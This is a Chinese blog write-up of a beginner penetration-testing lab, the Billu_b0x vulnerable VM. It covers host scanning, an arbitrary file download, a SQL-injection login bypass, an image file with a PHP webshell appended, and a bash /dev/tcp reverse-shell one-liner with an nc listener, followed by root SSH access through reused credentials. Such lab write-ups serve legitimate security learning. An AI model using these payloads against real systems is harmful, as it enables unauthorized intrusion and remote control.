记一次靶机练习之Billu_b0x

靶机练习之Billu_b0x

一、前言

这个靶场算是入门级别的吧·!对于我这个小白来说还是有一定难度的。在做题过程中遇到的问题,也侧面反映了自己对于web渗透认识还是不足的,,还需要更进一步的学习。

二、信息收集

1、主机发现
Nmap扫描同子网段下的主机

nmap -sP 192.168.79.0/24

在这里插入图片描述
在这里插入图片描述发现同网段的192.168.79.150存活主机
2、扫描端口

在这里插入图片描述发现目标主机开放了22,80端口
打开浏览器查看
在这里插入图片描述
3、扫描网站目录
在这里插入图片描述

三、漏洞发现与利用

逐一访问之前探测出来的页面,在访问到test.php时,提示file为空参数,需要传参,尝试传参?file=/etc/passwd,没有响应,于是改为使用POST方法,能够成功将passwd文件下载下来,存在任意文件下载。
在这里插入图片描述通过审计c.php直接获得了以下信息:

mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

##***直接注入***拿到index.php的源码,找到关键逻辑部分。我们看到目标先将我们输入的单引号清除,之后再验证登录信息的正确性,比较特殊的是验证顺序是先密码再账号,怪不得之前的尝试一直失败,知道源码之后绕过就很简单了,我们构造

    uname=or 1=1#
    pass=\

(此处为借鉴,大佬tql)
也可以在知道数据库的账号名和密码(前面已经发现)后直接登陆数据库,查看auth表找到后台登陆的用户名和密码

成功登录

在这里插入图片描述简单的浏览该网页,发现存在文件上传入口,尝试上传shell,根据提示信息只允许上传图片文件。

在这里插入图片描述
进一步审计刚刚下载下来的源码,可以发现show user模块存在文件包含。

在这里插入图片描述上传一张普通的照片,用bp进行拦截数据包,在图片末尾添加GIF89A <?php system($_GET['cmd']);?> 成功上传

反弹shell

echo "bash -i >& /dev/tcp/192.168.79.150/6767 0>&1" | bash

这里需要留意要进行URL编码(我在这个地方困惑了好久,导致一直无法反弹shell成功)
在这里插入图片描述kali进行监听

nc -lvp 6767

在这里插入图片描述
接下来进行提权,前面扫描出目标主机开放了22端口,那么查看相关的敏感文件,phpMyAdmin配置文件,发现
在这里插入图片描述然后尝试用这个root用户和口令去连ssh,成功连接上

在这里插入图片描述提权有好多种方式,这仅仅是碰巧走了一个捷径。看了其他的wp,发现有好多的提权方式,利用msf进行提权,利用linux版本自身的漏洞进行提权等等,接下去再去实践了。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值